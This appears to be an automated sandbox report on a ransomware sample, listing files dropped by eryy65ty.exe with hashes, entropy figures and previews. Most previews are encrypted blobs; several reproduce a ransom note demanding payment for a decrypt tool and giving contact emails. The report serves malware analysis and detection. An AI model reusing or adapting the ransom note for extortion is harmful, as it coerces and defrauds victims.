                                                                                                                                              SHA-512:19C004C2390D985B41FA847A2F996F9523166C29F6320F51EBBFB8993A2DB007AEF3B5B2534C7EF9E04AE668ED6F20811B06571E0F0B1E0E34B4A27657BDBD3D
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:..]9...).R..i.g..~t=.....zG.R....K<z.....QQ.....{Zg...ae......E|.0X..[..X[..0.K(.%..L.H..9'.]....R1..B...nuB+v..iO..ct.[!....T..A...|.........VC.K....K.Qk....\.BP....<..]D....C/}.......%....S.,"s...`......*.e=...W....S..W..p..1.~xUi....t....#X..M.#7\x..........3(@....-0(..F.\:.$T..J.}~1..q.u......~.g*..\\.....F.B$.w"~W...H..J.Rr........s.....Y.9.]w....9|.....D....e...G......J2....Y3.C@oe..lVM.fS.[P.v.,.{.[.....OGe..,..3{,..t.....C=o6]...{. ..xY..jw..L. ^.,..!gZ.g.].....)..i.|..U..A.:-.aV.`........[k.D.05D?s....tb...V3S&+ &z.a..*......s...0.4..d..B......~.8q..f|..mB.yZS...}...d..CS w.......H....c....:r.=..K...`u7..P.w.Qa.z...#e^.H.&.H.m.N.2..K....]"..........I.'7T.....@....7.5.....Kq....b.d..Z+..Ao.K.R.>R8;~F_.0.?.7m.......].....)8..(LN......$......f.E.#.w`.1.......T....... ....7..,._.."%..V5"J&...@^G..._j.=xIP...E.wA...ZW...}.:?a.o...kxTPQ.X...W..F...:.,5)...lH~.....g......{4.._....]9A..E.'.&...?.'...Y.O.....[..K..."..C\.,\.p.Jh...N.'\hxb..v
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6992
                                                                                                                                              Entropy (8bit):7.445905478467392
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:iORCwkNSTv5cG2EQGa99F6YJA6unSrDadW4Xm:GwkNSTh2EYD6L1nSrDadWR
                                                                                                                                              MD5:76842BEE04A33CF2BA8B3D7BB220D451
                                                                                                                                              SHA1:974A3ECF9FAA84571B2CC6E8429BC5B5E1CC9272
                                                                                                                                              SHA-256:F3D4A2CCAA36A6C02EFA3413ED3514C963DAC81C6F9DB9CB4079C3EC26A4640C
                                                                                                                                              SHA-512:19C004C2390D985B41FA847A2F996F9523166C29F6320F51EBBFB8993A2DB007AEF3B5B2534C7EF9E04AE668ED6F20811B06571E0F0B1E0E34B4A27657BDBD3D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:..]9...).R..i.g..~t=.....zG.R....K<z.....QQ.....{Zg...ae......E|.0X..[..X[..0.K(.%..L.H..9'.]....R1..B...nuB+v..iO..ct.[!....T..A...|.........VC.K....K.Qk....\.BP....<..]D....C/}.......%....S.,"s...`......*.e=...W....S..W..p..1.~xUi....t....#X..M.#7\x..........3(@....-0(..F.\:.$T..J.}~1..q.u......~.g*..\\.....F.B$.w"~W...H..J.Rr........s.....Y.9.]w....9|.....D....e...G......J2....Y3.C@oe..lVM.fS.[P.v.,.{.[.....OGe..,..3{,..t.....C=o6]...{. ..xY..jw..L. ^.,..!gZ.g.].....)..i.|..U..A.:-.aV.`........[k.D.05D?s....tb...V3S&+ &z.a..*......s...0.4..d..B......~.8q..f|..mB.yZS...}...d..CS w.......H....c....:r.=..K...`u7..P.w.Qa.z...#e^.H.&.H.m.N.2..K....]"..........I.'7T.....@....7.5.....Kq....b.d..Z+..Ao.K.R.>R8;~F_.0.?.7m.......].....)8..(LN......$......f.E.#.w`.1.......T....... ....7..,._.."%..V5"J&...@^G..._j.=xIP...E.wA...ZW...}.:?a.o...kxTPQ.X...W..F...:.,5)...lH~.....g......{4.._....]9A..E.'.&...?.'...Y.O.....[..K..."..C\.,\.p.Jh...N.'\hxb..v
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):757
                                                                                                                                              Entropy (8bit):7.740167145293433
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:wJC4d3DmQinLJuPXz3kZT6MuzqP/KUQP5fg8xnpnMysaa5L6iC+ZZpnVRJh/i2cD:iCnnurkJ6MHkg8VNs1B6gL15cxS2D
                                                                                                                                              MD5:1D33E41FA3182508E243C680D791CA78
                                                                                                                                              SHA1:6FD66ADF6126D203FAEDFE955CBD7713EBB945DF
                                                                                                                                              SHA-256:58A7E9B846AA40788F5669297D0C571310081AB22DA8263F18D3D245CD9416EE
                                                                                                                                              SHA-512:D467477A77D102C7A1402B3CF0B92D2DAE2FE451DDB30F690193120925AE5BEA9C37D3072E4D7FEEB3B7D10FB9C84F5F1248BA78423CBE3D42399B5EEEC7068B
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:o..2....8`.EB....U....7.(...n..,.M7l...._.q...r.....c$-.PE+.;.p..H_.e..k6..=....D>..^IkP./.... .........+8(..A..p.i.Q....c.Qa..!..@)......|....*......@.4...^...(.Y.P.......9..E9..{i.<....."....MI....&.>.R....._....[z-.k@f....D...k..B....)..tZ+.....LFfz.f...".S...j.wj...n.y1.5............Z...G.5..J.`.........]...........8f....<;.o<.c,..t ...~%i"]..E...[..b-".:u..>.,l.YU....I..g...3.D...Rc.*in.....[.=..L..2.%V...7..b=..E.R.rt.q.R3..%.<...%k..\x. .%...787d8846c"}>.t...3`.).}It...q.....PEq?..G.C....Lx..9J.k:...&.wVj..,.J"......N.m..E.#.VI.o(sy*ybr.5d/Q.b|K.h.|u.H~...[+..*s..P.m(N.. ._^)..A-h...F.q~.r..u.~J^(..UY..#..(..19\.Za4..m.Q.....ZV.~_.....wPlkw.C....x.._M.Xa..M....=.".(...W....N...t.U..p........B(..70xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):757
                                                                                                                                              Entropy (8bit):7.740167145293433
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:wJC4d3DmQinLJuPXz3kZT6MuzqP/KUQP5fg8xnpnMysaa5L6iC+ZZpnVRJh/i2cD:iCnnurkJ6MHkg8VNs1B6gL15cxS2D
                                                                                                                                              MD5:1D33E41FA3182508E243C680D791CA78
                                                                                                                                              SHA1:6FD66ADF6126D203FAEDFE955CBD7713EBB945DF
                                                                                                                                              SHA-256:58A7E9B846AA40788F5669297D0C571310081AB22DA8263F18D3D245CD9416EE
                                                                                                                                              SHA-512:D467477A77D102C7A1402B3CF0B92D2DAE2FE451DDB30F690193120925AE5BEA9C37D3072E4D7FEEB3B7D10FB9C84F5F1248BA78423CBE3D42399B5EEEC7068B
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:o..2....8`.EB....U....7.(...n..,.M7l...._.q...r.....c$-.PE+.;.p..H_.e..k6..=....D>..^IkP./.... .........+8(..A..p.i.Q....c.Qa..!..@)......|....*......@.4...^...(.Y.P.......9..E9..{i.<....."....MI....&.>.R....._....[z-.k@f....D...k..B....)..tZ+.....LFfz.f...".S...j.wj...n.y1.5............Z...G.5..J.`.........]...........8f....<;.o<.c,..t ...~%i"]..E...[..b-".:u..>.,l.YU....I..g...3.D...Rc.*in.....[.=..L..2.%V...7..b=..E.R.rt.q.R3..%.<...%k..\x. .%...787d8846c"}>.t...3`.).}It...q.....PEq?..G.C....Lx..9J.k:...&.wVj..,.J"......N.m..E.#.VI.o(sy*ybr.5d/Q.b|K.h.|u.H~...[+..*s..P.m(N.. ._^)..A-h...F.q~.r..u.~J^(..UY..#..(..19\.Za4..m.Q.....ZV.~_.....wPlkw.C....x.._M.Xa..M....=.".(...W....N...t.U..p........B(..70xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):615
                                                                                                                                              Entropy (8bit):7.698690058547372
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:kKHek9W4eov3FxUnuODx+KwKYtWJs7+KAbyXi2SFfaw/25UUObCSn:l+kM47v3FxUnfN+6YI+yKVXafBe5ICS
                                                                                                                                              MD5:10AFB49CB04AB46A73E9D77DB5FA2B45
                                                                                                                                              SHA1:1163BCA4F50EDDD65FBDB9D29DCF7D489580E6D9
                                                                                                                                              SHA-256:F9E12DDCF65A889967D218D115FAD4AC9BBB9E48952C5F7765F8539F60E2BAFF
                                                                                                                                              SHA-512:F985CFF971EE20DA755A8EF39BF28FFADBDAF39D70A2537C5BCF16D28DD58A9D77A746BED4A7965142771A21660EDD167AB93D5CA5DC039471F421ACB7A618BB
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:F...Jw...;n>......b}.X.@NE'^c.I.V/.|..{..Q\.D...C.{.....7...`....J4..ZwKy.i..CG.;]'..~.b.....n.?.....>5.S*}....x.(..".%..'..@0.CL.|..+..oD.}.....#..Z.Y.!_u..W....(.<.Ly.M.@#.......t......X.|....5y...n......*,id..r/.f.L..i. ..Z.h.4.O ..W.T....]:!............l2E..<....0ZRt..h`..5>...%U4`../...-...c.i.E..b..$".(.t.-...e.......Iz..Plt"}}n....L;./..!w...|s..d.......f...M...N..b..).U.....X..V.GU.+......d....^..+&Uq...\....8.{.%......'.r. .,d....u.?ae.(Y...o..s.SQ.T...S_..r.@R...y.\..Yu....Y..9..ee..]...^.......:..:.&..QT.`..`s!..U....Z.....V].g.86.3U.y..-.$..!@.DWd.Ud?+...'.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):615
                                                                                                                                              Entropy (8bit):7.698690058547372
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:kKHek9W4eov3FxUnuODx+KwKYtWJs7+KAbyXi2SFfaw/25UUObCSn:l+kM47v3FxUnfN+6YI+yKVXafBe5ICS
                                                                                                                                              MD5:10AFB49CB04AB46A73E9D77DB5FA2B45
                                                                                                                                              SHA1:1163BCA4F50EDDD65FBDB9D29DCF7D489580E6D9
                                                                                                                                              SHA-256:F9E12DDCF65A889967D218D115FAD4AC9BBB9E48952C5F7765F8539F60E2BAFF
                                                                                                                                              SHA-512:F985CFF971EE20DA755A8EF39BF28FFADBDAF39D70A2537C5BCF16D28DD58A9D77A746BED4A7965142771A21660EDD167AB93D5CA5DC039471F421ACB7A618BB
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:F...Jw...;n>......b}.X.@NE'^c.I.V/.|..{..Q\.D...C.{.....7...`....J4..ZwKy.i..CG.;]'..~.b.....n.?.....>5.S*}....x.(..".%..'..@0.CL.|..+..oD.}.....#..Z.Y.!_u..W....(.<.Ly.M.@#.......t......X.|....5y...n......*,id..r/.f.L..i. ..Z.h.4.O ..W.T....]:!............l2E..<....0ZRt..h`..5>...%U4`../...-...c.i.E..b..$".(.t.-...e.......Iz..Plt"}}n....L;./..!w...|s..d.......f...M...N..b..).U.....X..V.GU.+......d....^..+&Uq...\....8.{.%......'.r. .,d....u.?ae.(Y...o..s.SQ.T...S_..r.@R...y.\..Yu....Y..9..ee..]...^.......:..:.&..QT.`..`s!..U....Z.....V].g.86.3U.y..-.$..!@.DWd.Ud?+...'.0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):554
                                                                                                                                              Entropy (8bit):7.5993863534571435
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:pbu0KxRDaPCQE8KsGTGRJzZA0w/65uANuLDHn:pHQGE8xvAVnfH
                                                                                                                                              MD5:E5DA9F3039C226923A4A0C4FF60D686A
                                                                                                                                              SHA1:7F8B2EE97B81526FDBA395E351692214D16857E0
                                                                                                                                              SHA-256:A7AA5E5A6D93283420085738A066B38BD377A94884F133D64B713C61EB120317
                                                                                                                                              SHA-512:0AB648F7A2A3EFA456B436AE642418E5AD4D63CC67018667CAB05C0C0DE659F4A1EA7DD4487D927659D76C2831C1A4119F49C2D06612E007989A41A50FECAEA7
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:M.. '.I....|.....[r.}G.9h..w..l?8..n.9S..........s..3..l..}K...3-Z.@..T.}4.l~.S.O..{tX...H........#.....a...1..z.Y..W.~n.M..v.3.j/.+~..xPW....z.\3..z.m...V..Qp)k..ub.p...e...b(..xjQ.._.Q..n..B...*U.*.......LH..A...N.J.J+.$..5..L.-$n`.A.A..z ......jr../ww.:.4.g.-complete":true}}/.4.O..c.....Nj...........7R..M....\..6.f.G...z/..y....mE...f.`....'...E...i..E..&........u..lJ(.h....4..:.2H..3_X....H/./F..yi]........P.;...!...g..R.d....:..q..w(.}..Fu....z....5...Z..f=E.+.?.7.Mt}.`.jKv...f.~..r....p..?..}p........b..H#...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):554
                                                                                                                                              Entropy (8bit):7.5993863534571435
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:pbu0KxRDaPCQE8KsGTGRJzZA0w/65uANuLDHn:pHQGE8xvAVnfH
                                                                                                                                              MD5:E5DA9F3039C226923A4A0C4FF60D686A
                                                                                                                                              SHA1:7F8B2EE97B81526FDBA395E351692214D16857E0
                                                                                                                                              SHA-256:A7AA5E5A6D93283420085738A066B38BD377A94884F133D64B713C61EB120317
                                                                                                                                              SHA-512:0AB648F7A2A3EFA456B436AE642418E5AD4D63CC67018667CAB05C0C0DE659F4A1EA7DD4487D927659D76C2831C1A4119F49C2D06612E007989A41A50FECAEA7
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:M.. '.I....|.....[r.}G.9h..w..l?8..n.9S..........s..3..l..}K...3-Z.@..T.}4.l~.S.O..{tX...H........#.....a...1..z.Y..W.~n.M..v.3.j/.+~..xPW....z.\3..z.m...V..Qp)k..ub.p...e...b(..xjQ.._.Q..n..B...*U.*.......LH..A...N.J.J+.$..5..L.-$n`.A.A..z ......jr../ww.:.4.g.-complete":true}}/.4.O..c.....Nj...........7R..M....\..6.f.G...z/..y....mE...f.`....'...E...i..E..&........u..lJ(.h....4..:.2H..3_X....H/./F..yi]........P.;...!...g..R.d....:..q..w(.}..Fu....z....5...Z..f=E.+.?.7.Mt}.`.jKv...f.~..r....p..?..}p........b..H#...0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1568
                                                                                                                                              Entropy (8bit):7.881041716381299
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:trBJafoR/v9n3zKFS50PNwFn8zRa/tlcOb:5Bs+/l3zxSFwF8wkc
                                                                                                                                              MD5:7F57077E9662F3D7EF55C353803C80C0
                                                                                                                                              SHA1:541F79530668960F81C00C86B945C54E46BB8734
                                                                                                                                              SHA-256:AA91E745BD0EB74C5547D653F4E73165308124E6663E16EA244E3DEE8CF48F5C
                                                                                                                                              SHA-512:850056A4D464337027E1BF766D216BC5F154A57DE54B3479A04F9AC11AB6DAECC6ECE071F48DAD085EB17E007994DA1D638571D6315DECBAE39D67CCB394CD94
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.H../N F..i....b...8...?\..Y"..w.C.........o4#.....E.?DL.p.......M....4...q......J..&?.8.........bo..lT_..-...`...lW.......5b.I.dM.?"v.....Q.....>:...2..|Q/......U68@.<(d._.....^...<..R.........B..H,...O>|.Z:!..c.+I..F>.)...H5+U...1...[.&..U.)5..[Q..:X.1JxY.^=!f.6.7.t.A......[.M...u.5.&..H.<.1..3,.....aJ..H...aX...e84u.D.#..T.R ;.u.c..Z.....~.g....6...+c.O8L>^.p4....SqUP.-.EB.O$.-...4|......> Gp..."........]Rq...0a..t.w.*..g..a.nc}.../...Q..<B*..~6.)g.t.L..#.;6](>.3.s...up....\9....jLOJl.h.....i..]^.5.=.HF..".[4.X.....l.M..t.rQ.F......[q.......,..[..2...."F...f.&_.>7...>%..L....N.?.J.{lL3?}c.b...>.\T.%......i.BO b.....6..s.q.....C..pF%a.,......"[^......J..R..F.[o..S.f.u-.:P..1.).D.4.........../g.!.6.b...hW.....Te,.z?...A.`.$.L....!.:,....3|.:Q.4:~...M..l...z}...1{....-h.-}0.4>l.....7t....U......^D....+.wW.._...xi..;..C...+..Qp.x6.uq..kT....&..R.......;.1.4...!]...<....{....M.._].h.1..!J.R..GSN.;.F<.P6Z.CJ...N.X.R{. 0M........B..4....$/a
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1568
                                                                                                                                              Entropy (8bit):7.881041716381299
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:trBJafoR/v9n3zKFS50PNwFn8zRa/tlcOb:5Bs+/l3zxSFwF8wkc
                                                                                                                                              MD5:7F57077E9662F3D7EF55C353803C80C0
                                                                                                                                              SHA1:541F79530668960F81C00C86B945C54E46BB8734
                                                                                                                                              SHA-256:AA91E745BD0EB74C5547D653F4E73165308124E6663E16EA244E3DEE8CF48F5C
                                                                                                                                              SHA-512:850056A4D464337027E1BF766D216BC5F154A57DE54B3479A04F9AC11AB6DAECC6ECE071F48DAD085EB17E007994DA1D638571D6315DECBAE39D67CCB394CD94
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.H../N F..i....b...8...?\..Y"..w.C.........o4#.....E.?DL.p.......M....4...q......J..&?.8.........bo..lT_..-...`...lW.......5b.I.dM.?"v.....Q.....>:...2..|Q/......U68@.<(d._.....^...<..R.........B..H,...O>|.Z:!..c.+I..F>.)...H5+U...1...[.&..U.)5..[Q..:X.1JxY.^=!f.6.7.t.A......[.M...u.5.&..H.<.1..3,.....aJ..H...aX...e84u.D.#..T.R ;.u.c..Z.....~.g....6...+c.O8L>^.p4....SqUP.-.EB.O$.-...4|......> Gp..."........]Rq...0a..t.w.*..g..a.nc}.../...Q..<B*..~6.)g.t.L..#.;6](>.3.s...up....\9....jLOJl.h.....i..]^.5.=.HF..".[4.X.....l.M..t.rQ.F......[q.......,..[..2...."F...f.&_.>7...>%..L....N.?.J.{lL3?}c.b...>.\T.%......i.BO b.....6..s.q.....C..pF%a.,......"[^......J..R..F.[o..S.f.u-.:P..1.).D.4.........../g.!.6.b...hW.....Te,.z?...A.`.$.L....!.:,....3|.:Q.4:~...M..l...z}...1{....-h.-}0.4>l.....7t....U......^D....+.wW.._...xi..;..C...+..Qp.x6.uq..kT....&..R.......;.1.4...!]...<....{....M.._].h.1..!J.R..GSN.;.F<.P6Z.CJ...N.X.R{. 0M........B..4....$/a
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1568
                                                                                                                                              Entropy (8bit):7.885783920623849
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:RS1A/3wWExu117ayQ+BF+EhZSvNzj2v0s1kYnjaaGgVOn5YuldYx+SIZ025jv5k:RSEA4g+bFsNjat1ke0WOn5HldSyZx2
                                                                                                                                              MD5:65473903C7DD0522E952425DCAE1932E
                                                                                                                                              SHA1:084025B30491BC1B60CA8819B0D5D476A06CAB96
                                                                                                                                              SHA-256:F040D58F82C62D095C0D0D5BB2191A3A06CA41EC895C5D1E28D8FD225D132203
                                                                                                                                              SHA-512:507C6ED9149BF400C703D3AD21EAA169A6A33AAAE08D0D20AE64C4B5E41F89E6E974D926F5EC91A73E871F36BAFD5D93C09647BAE1ACBDE7B2A1C75DAB728324
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:...U...GVQ.....<.9q_..$..E.C..kI..Ew=..c..2..W..6.J.!..t.V.47..]...)PF.^.=,....K.z...Q..Mr../.C:..[..z..dEzN.....b.X+.2...../..5=Q.{.}..VVd{V..A.%5.....a.<..}..V..O9dwY^...0.._D...]=....F.....\.}......Q.@.D..ez.E..d.,OX.j.o..[.U.....R...2...z.hF..%.Z.....~L.~.....k..G.D.!...}.].)..1H..l./..W.tf..Xn......4S.g(.c&.2.AL7.U..@..Ui.G=.........W.....b?.<t........n...s.B..d.&9....p=Y.....X....S...i..6.....-...F......<..z+i...@..'./b#oq ....%c.=.-.....8.........Kn...B.l..D..Us.Z.F...........{........IH2.vU.y....X.w..Ri.0....m9..l..Q..%.7X.....sy..]./0.I.~.*......Z.....hvs:@A....E..YaX..>.V.........0._k:..+2k@.*A....Y...AHb... .C.n}.s........+.U...L.!Wx3y....q.....=...u...........9....a.k&`...7...T..m.|~...e......j.6...s..XRE$....t.....6X.L.;...y7.%|....~.T....B.~.....>...|...+.Y1G .>......?P.#o.(.J..1m.Q...r+`..:Z.....\&..3.d*.S.s..\..#...s......._.+_...(.s2.N.f.,i.-.s00.N@.J.L...bbw.....8.r0]./.Axq.......+.F....-......C.x...W.....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1568
                                                                                                                                              Entropy (8bit):7.885783920623849
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:RS1A/3wWExu117ayQ+BF+EhZSvNzj2v0s1kYnjaaGgVOn5YuldYx+SIZ025jv5k:RSEA4g+bFsNjat1ke0WOn5HldSyZx2
                                                                                                                                              MD5:65473903C7DD0522E952425DCAE1932E
                                                                                                                                              SHA1:084025B30491BC1B60CA8819B0D5D476A06CAB96
                                                                                                                                              SHA-256:F040D58F82C62D095C0D0D5BB2191A3A06CA41EC895C5D1E28D8FD225D132203
                                                                                                                                              SHA-512:507C6ED9149BF400C703D3AD21EAA169A6A33AAAE08D0D20AE64C4B5E41F89E6E974D926F5EC91A73E871F36BAFD5D93C09647BAE1ACBDE7B2A1C75DAB728324
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:...U...GVQ.....<.9q_..$..E.C..kI..Ew=..c..2..W..6.J.!..t.V.47..]...)PF.^.=,....K.z...Q..Mr../.C:..[..z..dEzN.....b.X+.2...../..5=Q.{.}..VVd{V..A.%5.....a.<..}..V..O9dwY^...0.._D...]=....F.....\.}......Q.@.D..ez.E..d.,OX.j.o..[.U.....R...2...z.hF..%.Z.....~L.~.....k..G.D.!...}.].)..1H..l./..W.tf..Xn......4S.g(.c&.2.AL7.U..@..Ui.G=.........W.....b?.<t........n...s.B..d.&9....p=Y.....X....S...i..6.....-...F......<..z+i...@..'./b#oq ....%c.=.-.....8.........Kn...B.l..D..Us.Z.F...........{........IH2.vU.y....X.w..Ri.0....m9..l..Q..%.7X.....sy..]./0.I.~.*......Z.....hvs:@A....E..YaX..>.V.........0._k:..+2k@.*A....Y...AHb... .C.n}.s........+.U...L.!Wx3y....q.....=...u...........9....a.k&`...7...T..m.|~...e......j.6...s..XRE$....t.....6X.L.;...y7.%|....~.T....B.~.....>...|...+.Y1G .>......?P.#o.(.J..1m.Q...r+`..:Z.....\&..3.d*.S.s..\..#...s......._.+_...(.s2.N.f.,i.-.s00.N@.J.L...bbw.....8.r0]./.Axq.......+.F....-......C.x...W.....
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1482
                                                                                                                                              Entropy (8bit):7.879143477862255
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:phSLVfLTgFaut3id9s9r3axNia1vJPAst3T+RGzCMxEq11n/sBLBvHaeop7+K2p/:phSL2cIrPa3ftqQJEq110BdSeop7+lp/
                                                                                                                                              MD5:FBE6A1C7684FEA42DEEBDB3C3076F88B
                                                                                                                                              SHA1:6BD1E16EA160B454C7D155B13F284A02670D2D29
                                                                                                                                              SHA-256:A8443A58333A7C244D72A9BCDBDF5D7B54E68A01945BA227436B8AF2FE508338
                                                                                                                                              SHA-512:68602262BFE5A82AAACB92EF5A66DF5EE86184DB41EB6F2F68E5970308C539489769688AD27E8C4B43E9C5D220C93A7F350AE59C439318674B4BA4D78D80CCC9
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:_..z77..l.w..U...( .yf.o......dP../o.?dp..Lf4....3m)ON....>_..V.....|u....9P...=L...+... J..`M...v...J.'...h.P.p......`.%........{..e.n.k.@.u(....8.9...%.4$%.D.fT....E....A.p...+R...>.q......7.C....|.@..C...-Z...o......B@B........x&u...x...9..r.;.....v~...E...!z.n...a..^....'......;%.#...V.%..;.8..#.98..K@.M..X\....3.X[.+1..A.j..O.V.B^.Jx3h...A.p..T@f3Q(}N..D..A..........P.r)...+o..q.w...w........'.=z.X.v.,7..8d......q./m.28.$....'..@$.G.|....(..%.....i..].F+,.6,Tg..`.V.e.....8...]Q..Z.&M....."...C.!tl...)F.9.h&?5.....|.y .d....4.......<...._f..>\!.=m.....9..O"/0.....O!T.....G7`.6.No>/PaE......".)>1.4dY.)..S...P.,.(.j.m|..K f...,.*.JB.O>.....=...k.v.Y.....b..e........H...../;.T..wF.v.......kP4h9Q...P.....+..u8.........V...|..E91.p.......)............$.J.a1.c!F~)NF..a...C....(m......1.v.....v.=y......C..z...s.s..G.<.EMa.....<.q...G.*...c.....{.......Tp*........d..B..Xw.N|.)..}Q...V.\~...r...%;.../k7.pU1.....);q.....-..L.l..]&.gm.j[<
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1482
                                                                                                                                              Entropy (8bit):7.879143477862255
                                                                                                                                              Encrypted:false
